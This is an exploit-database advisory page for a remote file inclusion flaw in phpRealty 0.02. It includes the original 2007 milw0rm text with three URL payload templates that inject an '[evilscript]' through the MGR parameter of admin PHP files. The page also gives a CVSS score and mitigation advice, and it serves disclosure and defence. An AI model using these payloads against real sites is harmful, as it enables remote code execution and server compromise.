phpRealty 0.02 (MGR) Remote File include

vendor:

phpRealty

by:

QTRinux

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: phpRealty

Affected Version From: 0.02

Affected Version To: 0.02

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

phpRealty 0.02 (MGR) Remote File include

The phpRealty 0.02 script is vulnerable to remote file inclusion. The vulnerability exists in the 'index.php', 'p_ins.php', and 'u_ins.php' files in the 'manager/admin' directory. An attacker can exploit this vulnerability by including a malicious script via the 'MGR' parameter in the URL. This can lead to remote code execution and potentially compromise the affected system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a newer version of phpRealty that addresses this issue. Alternatively, restrict access to the affected files and directories to trusted users only.

Source

Exploit-DB raw data:

|-------------------------------------------------------------------------------|
| |
| phpRealty 0.02  (MGR) Remote File include |
| |
| Script : phpRealty |
| Version : 0.02 |
| Authord : QTRinux |
| Contact : Qataro [at] hotmail [dot] com |
| Vendor : http://phprealty.budissy.com/phprealty/v0.02/ |
| DorK :   :(
|-------------------------------------------------------------------------------|
| Bug in : |
| manager/admin/index.php |
| manager/admin/p_ins.php  |
| manager/admin/u_ins.php  |
|-------------------------------------------------------------------------------|
| EXPLOIT : |
| |
| http://localhost/[ Path ]/manager/admin/index.php?MGR=[evilscript] |
| http://localhost/[ Path ]/manager/admin/p_ins.php?MGR=[evilscript] |
| http://localhost/[ Path ]/manager/admin/u_ins.php?MGR=[evilscript] |
|-------------------------------------------------------------------------------|
| Greetz : AlQaTaR!,MR.SH4R3S,Mo0oTeC,MaZaGi, |
| |
---------------------[ [Qatar Security Team] ]-------------------------

# milw0rm.com [2007-09-10]